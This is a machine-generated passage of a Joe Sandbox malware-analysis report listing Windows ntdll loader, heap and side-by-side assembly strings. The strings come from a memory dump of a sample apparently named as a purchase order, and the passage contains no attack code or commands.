                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                          Strings
                                                                                          • VerifierDlls, xrefs: 0143893D
                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 014386BD
                                                                                          • VerifierDebug, xrefs: 01438925
                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 0143880F
                                                                                          • VerifierFlags, xrefs: 014388D0
                                                                                          • HandleTraces, xrefs: 0143890F
                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 014386E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                          Strings
                                                                                          • Execute '.cxr %p' to dump context, xrefs: 01434B31
                                                                                          • LdrpGenericExceptionFilter, xrefs: 01434A7C
                                                                                          • LdrpProtectedCopyMemory, xrefs: 01434A74
                                                                                          • ***Exception thrown within loader***, xrefs: 01434AA7
                                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 01434A86
                                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01434AB8
                                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01434A75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                          Strings
                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0140977C
                                                                                          • apphelp.dll, xrefs: 013A6446
                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 014097B9
                                                                                          • LdrpInitShimEngine, xrefs: 01409783, 01409796, 014097BF
                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01409790
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014097A0, 014097C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          Strings
                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 01421F6A, 01421FA4, 01421FC4
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01421F8A
                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01421FA9
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01421FC9
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01421F82
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01421F6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                          Strings
                                                                                          • LdrpInitializeProcess, xrefs: 013EC5E4
                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 01427FF0
                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 01427F7B
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01427F8C, 01428000
                                                                                          • LdrpInitializeImportRedirection, xrefs: 01427F82, 01427FF6
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 013EC5E3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                          Strings
                                                                                          • LdrpInitializeProcess, xrefs: 013E8342
                                                                                          • @, xrefs: 013E84B1
                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E847E
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 013E8341
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1918872054
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 014152DE, 0141539F
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 014153BB
                                                                                          • HEAP: , xrefs: 014152ED, 014153AE
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 014152FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          • API String ID: 0-1657114761
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014220C0
                                                                                          • .Local, xrefs: 013E27F8
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 01421FE8
                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01421FE3, 014220BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                          • API String ID: 0-1239276146
                                                                                          Strings
                                                                                          • RtlDeactivateActivationContext, xrefs: 0142322F, 0142323C, 0142325B
                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01423234
                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01423241
                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01423260
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                          • API String ID: 0-1245972979
                                                                                          Strings
                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01410E72
                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01410EB5
                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01410DEC
                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01410E2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                          • API String ID: 0-1468400865
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                          • API String ID: 0-336120773
                                                                                          Strings
                                                                                          • LdrpDynamicShimModule, xrefs: 0141A7A5
                                                                                          • apphelp.dll, xrefs: 013D2382
                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0141A79F
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0141A7AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-176724104
                                                                                          Strings
                                                                                          • HEAP[%wZ]: , xrefs: 013C3175
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013C319D
                                                                                          • HEAP: , xrefs: 013C3184
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          • API String ID: 0-617086771
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-4253913091
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: $@
                                                                                          • API String ID: 2994545307-1077428164
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                          • API String ID: 0-2779062949
                                                                                          Strings
                                                                                          • LdrpCheckModule, xrefs: 01419F24
                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 01419F1C
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01419F2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-161242083
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-1334570610
                                                                                          Strings
                                                                                          • Failed to reallocate the system dirs string !, xrefs: 014280E2
                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 014280E9
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 014280F3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1783798831
                                                                                          Strings
                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01434508
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01434519
                                                                                          • LdrpCheckRedirection, xrefs: 0143450F
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                          Strings
                                                                                          • LdrResSearchResource Enter, xrefs: 013BA933
                                                                                          • LdrResSearchResource Exit, xrefs: 013BA945
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                          Strings
                                                                                          • *** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!, xrefs: 01452B91
                                                                                          • , xrefs: 01452E38
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $*** ASSERT FAILED: Input parameter pwmszLanguage for function RtlGetUILanguageInfo is not a valid multi-string!
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Legacy$UEFI
                                                                                          Strings
                                                                                          • LdrpResGetMappingSize Exit, xrefs: 013BAB9C
                                                                                          • LdrpResGetMappingSize Enter, xrefs: 013BAB8A
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$Flst
                                                                                          Strings
                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013B0586
                                                                                          • kLsE, xrefs: 013B05FE
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                          Strings
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 01422616
                                                                                          • RtlpInsertAssemblyStorageMapEntry, xrefs: 01422611
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpInsertAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand
                                                                                          Strings
                                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA229
                                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA21B
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F*;h$F*;h(
                                                                                          Strings
                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0144AABF
                                                                                          • F*;h(, xrefs: 0144AAD7, 0144AAFE
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F*;h($NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Cleanup Group$Threadpool!
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MUI
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w
                                                                                          • API String ID: 0-476252946
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID: 0-3916222277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: GlobalTags
                                                                                          • API String ID: 0-1106856819
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #%u
                                                                                          • API String ID: 0-232158463
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .mui
                                                                                          • API String ID: 0-1199573805
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: EXT-
                                                                                          • API String ID: 0-1948896318
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryHash
                                                                                          • API String ID: 0-2202222882
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: kLsE
                                                                                          • API String ID: 0-3058123920
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TrustedInstaller
                                                                                          • API String ID: 0-565535830
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #
                                                                                          • API String ID: 0-1885708031
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @
                                                                                          • API String ID: 0-2766056989
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: BinaryName
                                                                                          • API String ID: 0-215506332
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: WindowsExcludedProcs
                                                                                          • API String ID: 0-3583428290
                                                                                          Strings
                                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 014385DE
